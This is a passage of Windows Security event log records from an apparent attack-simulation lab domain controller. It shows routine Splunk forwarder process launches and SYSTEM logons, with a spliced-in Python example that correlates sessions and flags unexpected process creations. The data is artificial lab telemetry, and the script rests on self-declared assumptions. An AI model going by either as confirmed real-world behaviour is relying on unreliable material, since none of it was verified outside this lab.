Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264405
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264407
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x802586
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264410
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x805E30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264409
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x805E30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62608
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264408
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x805E30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264412
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x806035
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62611
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264411
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x806035
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264413
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x806035
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:10:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264415
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x7b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
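Two of the explanatory notes above describe work an analyst actually has to do by hand on an export like this: the 4634 note says a logoff "may be positively correlated with a logon event using the Logon ID value" (and that Logon IDs are only unique between reboots on one computer), and the 4688 note explains the three Token Elevation Types while the record itself only carries the unexpanded placeholder %%1936. The following is an added example, not part of this log or of Splunk's or Microsoft's tooling. It parses the multi-line record layout used on this page, stitches the 4624/4672/4634 trio for one Logon ID together, decodes the placeholder, and flags a 4688 that deviates from the forwarder pattern seen here (image under the forwarder's bin directory, splunkd.exe as parent, type-1 token under the SYSTEM logon 0x3E7). The placeholder-to-type mapping, the allow-listed paths and the embedded SAMPLE export are this example's own assumptions; SAMPLE is constructed and shortened, modelled on the 03:10:55 records for Logon ID 0x809B13 and the splunk-powershell.exe 4688 above, not copied from them.

```python
"""Parse a Splunk-exported Windows Security log and correlate its events (added example)."""
import re
from collections import defaultdict

# Assumed: the unexpanded %%1936..%%1938 placeholders are Token Elevation Types 1..3.
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}
# Hypothetical allow-list for forwarder children, built from the paths on the page.
SPLUNK_DIR = "C:\\Program Files\\SplunkUniversalForwarder\\bin\\"
SPLUNK_PARENT = SPLUNK_DIR + "splunkd.exe"
TIMESTAMP_RE = re.compile(r"\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M")

def parse_events(text):
    """One dict per event: 'Key=value' Splunk metadata; 'Key: value' message fields prefixed
    by their 'Section:' header (Subject vs New Logon 'Logon ID'); prose lines are skipped."""
    events, cur, section, last = [], None, "", None
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if TIMESTAMP_RE.fullmatch(line):
            cur, section, last = {"_time": line}, "", None
            events.append(cur)
        elif cur is None:
            continue  # text before the first timestamp, i.e. a truncated record
        elif "=" in line and (": " not in line or line.index("=") < line.index(": ")):
            key, val = line.split("=", 1)
            cur[key.strip()], last = val.strip(), None
        elif line.endswith(":") and ": " not in line:
            section, last = line[:-1], None
        elif ": " in line:
            key, val = line.split(": ", 1)
            last = f"{section}/{key.strip()}" if section else key.strip()
            cur[last] = val.strip()
        elif last and re.fullmatch(r"\S+", line):
            cur[last] += " " + line  # continuation of the 4672 privilege list
    return events

def logon_sessions(events):
    """Stitch 4624/4672/4634 by Logon ID; IDs are unique only per host between reboots."""
    sessions = defaultdict(dict)
    for ev in events:
        host, code = ev.get("ComputerName", "?"), ev.get("EventCode")
        if code == "4624":
            sessions[(host, ev.get("New Logon/Logon ID"))].update(
                account=ev.get("New Logon/Account Name"),
                logon_type=ev.get("Logon Information/Logon Type"),
                logon_at=ev["_time"])
        elif code == "4672":
            sessions[(host, ev.get("Subject/Logon ID"))]["privileges"] = ev.get("Subject/Privileges", "").split()
        elif code == "4634":
            sessions[(host, ev.get("Subject/Logon ID"))]["logoff_at"] = ev["_time"]
    return dict(sessions)

def token_elevation_type(ev):
    """1, 2 or 3 for a 4688 event; None if the placeholder is not recognised."""
    return TOKEN_ELEVATION.get(ev.get("Process Information/Token Elevation Type"))

def check_process_creation(ev, expected_dir=SPLUNK_DIR, expected_parent=SPLUNK_PARENT):
    """Findings for a 4688 that deviates from the page's pattern: image under the forwarder
    bin directory, splunkd.exe as parent, type-1 token for a child of SYSTEM (Logon ID 0x3E7)."""
    image = ev.get("Process Information/New Process Name", "")
    parent = ev.get("Process Information/Creator Process Name", "")
    findings = []
    if not image.lower().startswith(expected_dir.lower()):
        findings.append(f"image outside {expected_dir}: {image}")
    if parent.lower() != expected_parent.lower():
        findings.append(f"unexpected parent: {parent}")
    if ev.get("Creator Subject/Logon ID") == "0x3E7" and token_elevation_type(ev) != 1:
        findings.append(f"SYSTEM creator but token elevation type {token_elevation_type(ev)}")
    return findings

# Constructed sample in the page's export layout (shortened; not copied from the page).
SAMPLE = r"""
04/19/2021 03:10:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x809B13
04/19/2021 03:10:55 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x809B13
Privileges: SeSecurityPrivilege
SeBackupPrivilege
04/19/2021 03:10:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x809B13
This event is generated when a logon session is destroyed.
04/19/2021 03:11:13 PM
EventCode=4688
Creator Subject:
Logon ID: 0x3E7
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
"""
```

To run it over the real export, pass the file's text to parse_events and feed the result to logon_sessions and check_process_creation; a session with a logon but no logoff (or a logoff whose logon is missing, as at the top of this excerpt) shows up as a dict lacking one of the two timestamps, and every 4688 on this page should come back with no findings.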
04/19/2021 03:10:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264414
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfa4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264416
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1240
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264417
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264418
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x141c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264420
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264419
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x498
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:10:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264423
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x809B13
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:10:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264422
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x809B13
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62625
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:10:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264421
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x809B13
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264425
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a40
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264424
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264426
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
